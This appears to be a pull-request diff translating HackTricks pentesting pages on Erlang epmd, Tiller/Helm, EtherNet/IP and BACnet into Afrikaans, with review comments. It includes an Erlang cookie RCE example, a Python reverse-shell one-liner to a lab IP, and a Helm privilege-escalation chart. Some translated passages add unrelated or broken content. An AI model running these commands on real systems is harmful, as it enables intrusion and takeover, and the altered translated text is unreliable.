@@ -41,30 +36,26 @@ apt-get install erlang erl #Once Erlang is installed this will promp an erlang terminal 1> net_adm:names(''). #This will return the listen addresses ``` - -## Automatic - +## Outomaties ```bash nmap -sV -Pn -n -T4 -p 4369 --script epmd-info PORT STATE SERVICE VERSION 4369/tcp open epmd Erlang Port Mapper Daemon -| epmd-info: +| epmd-info: | epmd_port: 4369 -| nodes: +| nodes: | bigcouch: 11502 | freeswitch: 8031 | ecallmgr: 11501 | kazoo_apps: 11500 |_ kazoo-rabbitmq: 25672 ``` +# Erlang Koekie RCE -# Erlang Cookie RCE - -## Remote Connection - -If you can **leak the Authentication cookie** you will be able to execute code on the host. Usually, this cookie is located in `~/.erlang.cookie` and is generated by erlang at the first start. If not modified or set manually it is a random string \[A:Z] with a length of 20 characters. +## Verre Verbinding +As jy die **Verifikasiekoekie kan uitlek**, sal jy in staat wees om kode op die gasheer uit te voer. Gewoonlik is hierdie koekie in `~/.erlang.cookie` geleë en word dit deur Erlang gegenereer by die eerste begin. As dit nie gewysig of handmatig ingestel word nie, is dit 'n lukrake string \[A:Z] met 'n lengte van 20 karakters. ```bash greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10] 
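Review bot: the lines `-| epmd-info:` / `+| epmd-info:` and `-| nodes:` / `+| nodes:` inside the fenced nmap output differ only in invisible whitespace; quoted tool output should not be touched in a translation commit, so revert those two lines. In the same hunk, `## Remote Connection` as "## Verre Verbinding" reads oddly next to the later "## Plaaslike Verbinding"; "## Afgeleë verbinding" or "## Afstandverbinding" is the usual pairing with "plaaslik".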
@@ -76,50 +67,43 @@ At last, we can start an erlang shell on the remote system. (test@target.fqdn)1>os:cmd("id"). "uid=0(root) gid=0(root) groups=0(root)\n" ``` - -More information in [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\ -The author also share a program to brutforce the cookie: +Meer inligting in [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\ +Die skrywer deel ook 'n program om die koekie te kragtig te kraak: {% file src="../.gitbook/assets/epmd_bf-0.1.tar.bz2" %} -## Local Connection - -In this case we are going to abuse CouchDB to escalate privileges locally: +## Plaaslike Verbinding +In hierdie geval gaan ons CouchDB misbruik om plaaslike voorregte te verhoog: ```bash -HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE +HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE (anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]). "homer\n" (anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]). ``` - -Example taken from [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\ -You can use **Canape HTB machine to** **practice** how to **exploit this vuln**. +Voorbeeld geneem van [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\ +Jy kan die **Canape HTB-masjien gebruik** om te **oefen** hoe om hierdie kwesbaarheid te **uitbuit**. 
## Metasploit - ```bash #Metasploit can also exploit this if you know the cookie msf5> use exploit/multi/misc/erlang_cookie_rce ``` - # Shodan -* `port:4369 "at port"` +* `poort:4369 "by poort"`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
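Review bot: the Shodan query in the `# Shodan` section is translated, turning the literal search string `port:4369 "at port"` into `poort:4369 "by poort"`; `port:` is a Shodan filter keyword and the quoted text is matched literally, so the translated bullet returns nothing. Revert that bullet to the original (the WHOIS file in this same patch correctly leaves `port:43 whois` untouched). Also in this hunk, "om die koekie te kragtig te kraak" has a doubled "te" and is a loose rendering of "bruteforce"; "om die koekie met brute krag te kraak" is clearer.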
- - diff --git a/network-services-pentesting/44134-pentesting-tiller-helm.md b/network-services-pentesting/44134-pentesting-tiller-helm.md index 794741bc3..02e2240b5 100644 --- a/network-services-pentesting/44134-pentesting-tiller-helm.md +++ b/network-services-pentesting/44134-pentesting-tiller-helm.md @@ -1,35 +1,30 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Basic Information +# Basiese Inligting -Helm is the **package manager** for Kubernetes. It allows to package YAML files and distribute them in public and private repositories. These packages are called **Helm Charts**. **Tiller** is the **service** **running** by default in the port 44134 offering the service. - -**Default port:** 44134 +Helm is die **pakketbestuurder** vir Kubernetes. Dit maak dit moontlik om YAML-lêers te verpak en hulle in openbare en private repositoriums te versprei. Hierdie pakkette word **Helm Charts** genoem. **Tiller** is die **diens** wat standaard op die poort 44134 loop en die diens aanbied. +**Standaardpoort:** 44134 ``` PORT STATE SERVICE VERSION 44134/tcp open unknown ``` +# Enumerasie -# Enumeration - -If you can **enumerate pods and/or services** of different namespaces enumerate them and search for the ones with **"tiller" in their name**: - +As jy pods en/of dienste van verskillende namespaces kan **enumereer**, enumereer hulle en soek na diegene met **"tiller" in hul naam**: ```bash kubectl get pods | grep -i "tiller" kubectl get services | grep -i "tiller" @@ -38,9 +33,7 @@ kubectl get services -n kube-system | grep -i "tiller" kubectl get pods -n | grep -i "tiller" kubectl get services -n | grep -i "tiller" ``` - -Examples: - +Voorbeelde: ```bash kubectl get pods -n kube-system NAME READY STATUS RESTARTS AGE 
@@ -52,48 +45,39 @@ NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) kube-dns ClusterIP 10.96.0.10 53/UDP,53/TCP,9153/TCP 35m tiller-deploy ClusterIP 10.98.57.159 44134/TCP 35m ``` - -You could also try to find this service running checking the port 44134: - +Jy kan ook probeer om hierdie diens te vind deur die poort 44134 te kontroleer: ```bash sudo nmap -sS -p 44134 ``` +Sodra jy dit ontdek het, kan jy daarmee kommunikeer deur die klient helm-toepassing af te laai. Jy kan gereedskap soos `homebrew` gebruik, of kyk na [**die amptelike vrystellingsbladsy**](https://github.com/helm/helm/releases)**.** Vir meer besonderhede, of vir ander opsies, sien [die installasiegids](https://v2.helm.sh/docs/using\_helm/#installing-helm). -Once you have discovered it you can communicate with it downloading the client helm application. You can use tools like `homebrew`, or look at [**the official releases page**](https://github.com/helm/helm/releases)**.** For more details, or for other options, see [the installation guide](https://v2.helm.sh/docs/using\_helm/#installing-helm). - -Then, you can **enumerate the service**: - +Dan kan jy **die diens opnoem**: ``` helm --host tiller-deploy.kube-system:44134 version ``` +## Voorregverhoging -## Privilege Escalation - -By default **Helm2** was installed in the **namespace kube-system** with **high privileges**, so if you find the service and has access to it, this could allow you to **escalate privileges**. - -All you need to do is to install a package like this one: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) that will give the **default service token access to everything in the whole cluster.** +Standaard is **Helm2** geïnstalleer in die **namespace kube-system** met **hoë voorregte**, so as jy die diens vind en toegang daartoe het, kan dit jou in staat stel om **voorregte te verhoog**. 
+Al wat jy hoef te doen is om 'n pakkie soos hierdie een te installeer: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) wat die **standaard diens-token toegang gee tot alles in die hele groep.** ``` git clone https://github.com/Ruil1n/helm-tiller-pwn helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn /pwnchart ``` - -In [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) you have the **explanation of the attack**, but basically, if you read the files [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) and [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) inside _helm-tiller-pwn/pwnchart/templates/_ you can see how **all the privileges are being given to the default token**. +In [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) het jy die **verduideliking van die aanval**, maar basies, as jy die lêers [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) en [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) binne _helm-tiller-pwn/pwnchart/templates/_ lees, kan jy sien hoe **alle voorregte aan die verstek-token gegee word**.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
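Review bot: `**Default port:**` is translated as `**Standaardpoort:**` in the first hunk, while the other files in this patch (WS-Discovery, WHOIS, epmd, EtherNet/IP) use `**Verstekpoort:**`; pick one term for the whole repository. In the last hunk, "die klient helm-toepassing" should be "die Helm-kliëntprogram" (kliënt with the diaeresis), and the header and footer banners again differ ("versameling van eksklusiewe" vs "versameling eksklusiewe", "hacking-truuks" vs "hack-truuks"), which the shared-banner fix noted on the WS-Discovery file would resolve.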
- - diff --git a/network-services-pentesting/44818-ethernetip.md b/network-services-pentesting/44818-ethernetip.md index 171de8f91..c55f36c8a 100644 --- a/network-services-pentesting/44818-ethernetip.md +++ b/network-services-pentesting/44818-ethernetip.md @@ -1,56 +1,82 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# **Protocol Information** +# **Protokol-inligting** -EtherNet/IP is an **industrial Ethernet networking protocol** commonly used in **industrial automation control systems**. It was developed by Rockwell Automation in the late 1990s and is managed by ODVA. The protocol ensures **multi-vendor system interoperability** and is utilized in various applications such as **water processing plants**, **manufacturing facilities**, and **utilities**. To identify an EtherNet/IP device, a query is sent to **TCP/44818** with a **list Identities Message (0x63)**. - -**Default port:** 44818 UDP/TCP +EtherNet/IP is 'n **industriële Ethernet-netwerkprotokol** wat algemeen gebruik word in **industriële outomatiseringsbeheerstelsels**. Dit is ontwikkel deur Rockwell Automation in die laat 1990's en word bestuur deur ODVA. Die protokol verseker **multi-vendor-sisteeminteroperabiliteit** en word gebruik in verskeie toepassings soos **waterverwerkingsaanlegte**, **vervaardigingsfasiliteite** en **nutsvoorzienings**. Om 'n EtherNet/IP-toestel te identifiseer, word 'n navraag gestuur na **TCP/44818** met 'n **lys-identiteitsboodskap (0x63)**. +**Verstekpoort:** 44818 UDP/TCP ``` PORT STATE SERVICE 44818/tcp open EtherNet/IP ``` +# **Opsomming** -# **Enumeration** +Enumeration is 'n belangrike stap in die pentesting-proses wat dit moontlik maak om inligting oor 'n teikenstelsel te versamel. Dit behels die identifisering van aktiewe dienste, poorte, protokolle en ander relevante inligting wat kan help om die stelsel te benader en te manipuleer. Hier is 'n paar tegnieke wat gebruik kan word vir enumerasie: +## **1. Port Scanning** +Port scanning is die proses waarin die teikenstelsel se poorte ondersoek word om aktiewe dienste te identifiseer. Dit kan gedoen word deur gebruik te maak van gereedskap soos Nmap, hping3 of netcat. + +## **2. Service Fingerprinting** +Service fingerprinting behels die identifisering van die spesifieke dienste wat op die teikenstelsel beskikbaar is. 
Dit kan gedoen word deur na spesifieke kenmerke of banners te soek wat deur die dienste uitgestuur word. + +## **3. Protocol Analysis** +Protokolanalise behels die ondersoek van die protokolle wat deur die teikenstelsel gebruik word. Dit kan help om kwesbaarhede of swak punte in die protokolle te identifiseer wat uitgebuit kan word. + +## **4. Directory and File Enumeration** +Hierdie tegniek behels die soek na directories en lêers op die teikenstelsel. Dit kan gedoen word deur gebruik te maak van gereedskap soos DirBuster, Dirsearch of Gobuster. + +## **5. User Enumeration** +User enumerasie behels die identifisering van gebruikers op die teikenstelsel. Dit kan gedoen word deur gebruik te maak van gereedskap soos enum4linux, ldapsearch of brute force-tegnieke. + +## **6. DNS Enumeration** +DNS enumerasie behels die versameling van inligting oor die DNS-infrastruktuur van die teikenstelsel. Dit kan gedoen word deur gebruik te maak van gereedskap soos nslookup, dig of dnsenum. + +## **7. SNMP Enumeration** +SNMP enumerasie behels die identifisering van SNMP-dienste en die versameling van inligting oor die teikenstelsel deur middel van SNMP. Dit kan gedoen word deur gebruik te maak van gereedskap soos snmpwalk, snmp-check of onesixtyone. + +## **8. SMB Enumeration** +SMB enumerasie behels die identifisering van SMB-dienste en die versameling van inligting oor die teikenstelsel deur middel van SMB. Dit kan gedoen word deur gebruik te maak van gereedskap soos enum4linux, smbclient of nmap. + +## **9. SMTP Enumeration** +SMTP enumerasie behels die identifisering van SMTP-dienste en die versameling van inligting oor die teikenstelsel deur middel van SMTP. Dit kan gedoen word deur gebruik te maak van gereedskap soos nmap, smtp-user-enum of metasploit. + +## **10. Web Enumeration** +Web enumerasie behels die identifisering van webdienste en die versameling van inligting oor die teikenstelsel deur middel van webtoepassings. 
Dit kan gedoen word deur gebruik te maak van gereedskap soos dirb, gobuster of nikto. + +Enumeration is 'n kritieke stap in die pentesting-proses wat die grondslag lê vir verdere aanvalle en uitbuiting van die teikenstelsel. Dit is belangrik om versigtig en eties te wees tydens die enumerasieproses om enige ongewenste skade of inbreuk op die teikenstelsel te voorkom. ```bash nmap -n -sV --script enip-info -p 44818 pip3 install cpppo python3 -m cpppo.server.enip.list_services [--udp] [--broadcast] --list-identity -a ``` - # Shodan -* `port:44818 "product name"` +* `port:44818 "produknaam"`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
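Review bot: the `# **Enumeration**` hunk replaces the original heading with `# **Opsomming**` ("summary") and inserts roughly thirty lines that have no counterpart in the English source, a generic ten-point list (`## **1. Port Scanning**` through `## **10. Web Enumeration**`, covering DNS, SNMP, SMB, SMTP and web enumeration) plus a closing ethics paragraph, none of which concern EtherNet/IP; drop the added block and render the heading as `# **Enumerasie**` so the page keeps its one-to-one structure with the English version. Two smaller points in the same file: the Shodan query `port:44818 "product name"` is a literal search string and must not become `"produknaam"` (the translated query will not match anything), and `list Identities Message (0x63)` is the name of the encapsulation command, which is better kept in English beside the Afrikaans gloss rather than rendered as `lys-identiteitsboodskap`. The hunk also strips the blank line between `**Verstekpoort:** 44818 UDP/TCP` and the opening fence and the blank line after the closing fence; keep blank lines around fenced blocks and headings as in the original so rendering is unchanged and the diff stays minimal. Finally, the header and footer bullets are translated differently in this file than in the others touched by this PR (`GitHub-opslagplekke` here, `github-repos` and `github-opslag` elsewhere; `hack-truuks` versus `hacktruuks`); translate that boilerplate block once and reuse it verbatim.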
- - diff --git a/network-services-pentesting/47808-udp-bacnet.md b/network-services-pentesting/47808-udp-bacnet.md index 6a118d3d2..7b606eafd 100644 --- a/network-services-pentesting/47808-udp-bacnet.md +++ b/network-services-pentesting/47808-udp-bacnet.md @@ -1,35 +1,30 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
-# Protocol Information +# Protokol Inligting -**BACnet** is a **communications protocol** for Building Automation and Control (BAC) networks that leverages the **ASHRAE**, **ANSI**, and **ISO 16484-5 standard** protocol. It facilitates communication among building automation and control systems, enabling applications such as HVAC control, lighting control, access control, and fire detection systems to exchange information. BACnet ensures interoperability and allows computerized building automation devices to communicate, regardless of the specific services they provide. - -**Default port:** 47808 +**BACnet** is 'n **kommunikasieprotokol** vir Gebou-outomatisering en -beheer (BAC) netwerke wat gebruik maak van die **ASHRAE**, **ANSI**, en **ISO 16484-5 standaardprotokol**. Dit fasiliteer kommunikasie tussen gebou-outomatisering en -beheerstelsels, wat toepassings soos lugversorgingsbeheer, ligbeheer, toegangsbeheer en brandopsporingstelsels in staat stel om inligting uit te ruil. BACnet verseker interoperabiliteit en stel gerekenariseerde gebou-outomatiseringsapparate in staat om te kommunikeer, ongeag die spesifieke dienste wat hulle bied. +**Verstekpoort:** 47808 ```text PORT STATE SERVICE 47808/udp open BACNet -- Building Automation and Control NetworksEnumerate ``` +# Opstel -# Enumeration - -## Manual - +## Handleiding ```bash pip3 install BAC0 import BAC0 
@@ -40,14 +35,21 @@ bacnet.vendorName.strValue #I couldn't find how to obtain the same data as nmap with this library or any other #talk me if you know how please ``` +## Outomaties -## Automatic +BACnet is 'n protokol wat gebruik word vir die outomatiese beheer van geboue. Dit maak gebruik van UDP (User Datagram Protocol) vir kommunikasie. UDP is 'n onbetroubare protokol wat nie 'n verbindingsgeoriënteerde verbinding handhaaf nie. Dit beteken dat daar geen bevestiging van ontvangs of herverstuur van verlore pakkette is nie. +Die eerste stap in die outomatiese ontdekking van BACnet-toestelle is om UDP-pakkette na die uitsaai-adres (255.255.255.255) te stuur. Hierdie pakkette sal deur alle toestelle in die netwerk ontvang word. Die toestelle wat BACnet ondersteun, sal reageer met 'n UDP-pakket wat die inligting oor die toestel bevat. + +Die volgende stap is om die BACnet-toestelle te identifiseer en te onderskei. Dit kan gedoen word deur die inhoud van die UDP-pakket te ontleed en die BACnet-objekte en -dienste te identifiseer wat deur die toestel ondersteun word. + +Nadat die toestelle geïdentifiseer is, kan verdere ondersoek gedoen word om die toestel se funksionaliteit en beveiligingskwessies te bepaal. Dit kan insluit die ondersoek van BACnet-objekte, die uitvoering van BACnet-dienste en die identifisering van moontlike kwesbaarhede. + +Dit is belangrik om te verstaan dat die outomatiese ontdekking en ondersoek van BACnet-toestelle slegs uitgevoer mag word op toestelle en netwerke waarvoor jy die regte toestemming het. Onwettige toegang tot BACnet-toestelle kan wettige gevolge hê. ```bash nmap --script bacnet-info --script-args full=yes -sU -n -sV -p 47808 ``` - -This script does not attempt to join a BACnet network as a foreign device, it simply sends BACnet requests directly to an IP addressable device. 
+Hierdie skrip probeer nie om by 'n BACnet-netwerk aan te sluit as 'n vreemde toestel nie, dit stuur eenvoudig BACnet-versoeke direk na 'n IP-adresbare toestel. ## Shodan @@ -58,16 +60,14 @@ This script does not attempt to join a BACnet network as a foreign device, it si
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 